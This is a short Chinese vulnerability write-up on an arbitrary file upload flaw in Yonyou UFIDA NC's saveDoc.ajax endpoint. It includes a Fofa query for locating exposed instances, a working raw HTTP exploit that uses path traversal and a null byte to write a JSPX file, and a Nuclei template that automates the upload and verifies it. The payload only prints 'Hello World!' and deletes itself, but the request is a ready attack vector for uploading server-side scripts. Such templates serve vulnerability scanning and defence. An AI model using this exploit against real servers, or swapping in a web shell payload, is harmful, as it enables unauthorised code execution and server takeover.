用友-UFIDA-NC 任意文件上传漏洞

# Fofa搜索语法title="产品登录界面"

POST /uapws/saveDoc.ajax?ws=/../../test1.jspx%00 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Content-Type: application/x-www-form-urlencodedcontent=<hi xmlns:hi="http://java.sun.com/JSP/Page">      <hi:directive.page import="java.util.*,java.io.*,java.net.*"/>   <hi:scriptlet>            out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete();    </hi:scriptlet></hi>

id: yonyou-UFIDA-NC-saveDoc-ajax-uploadfileinfo:  name: 用友-UFIDA-NC saveDoc.ajax 存在任意文件上传，攻击者可通过此漏洞上传恶意脚本文件，对服务器的正常运行造成安全威胁！  author: ly  severity: high  metadata:     fofa-query: title="产品登录界面"variables:  filename: "{{to_lower(rand_base(5))}}"  boundary: "{{to_lower(rand_base(20))}}"http:  - raw:      - |        POST /uapws/saveDoc.ajax?ws=/../../{{filename}}.jspx%00 HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0        Content-Type: application/x-www-form-urlencoded        content=<hi xmlns:hi="http://java.sun.com/JSP/Page">              <hi:directive.page import="java.util.*,java.io.*,java.net.*"/>          <hi:scriptlet>                    out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete();           </hi:scriptlet>        </hi>      - |        GET /uapws/{{filename}}.jspx HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0    matchers:      - type: dsl        dsl:          - status_code==200 && contains_all(body,"Hello World!")